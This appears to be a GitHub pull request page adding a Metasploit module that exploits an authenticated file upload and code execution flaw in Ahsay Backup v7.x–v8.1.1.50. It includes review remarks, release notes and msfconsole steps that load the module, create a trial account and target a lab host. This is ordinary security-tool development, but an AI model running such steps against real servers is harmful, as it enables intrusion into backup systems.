-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Ahsay backup v7.x - v8.1.1.50 file upload #12095
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
syntax and style
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Added random username and password generating
@Wietsman : I just wanted to say it's been a pleasure working with you via the Metasploit Slack and I appreciate your willingness to add a version check and account cleanup. Thanks for the module! |
Release NotesThe ahsay_fileupload module has been added to the framework. It exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. |
This exploit will upload a file to the server, it is possible to change the path and upload it in a directory that is accessible through the webserver. For this to work a valid user account is necessary, but trial accounts are enabled by default and an account can be created this way.
Installation if the Ahsay Backup:
http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
C:\Program Files\AhsayCBS\bin\startup.bat
)Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/misc/ahsay_fileupload
set CREATEACCOUNT true
set RHOST 172.16.238.175
set LHOST 172.16.238.235
run
msfconsole output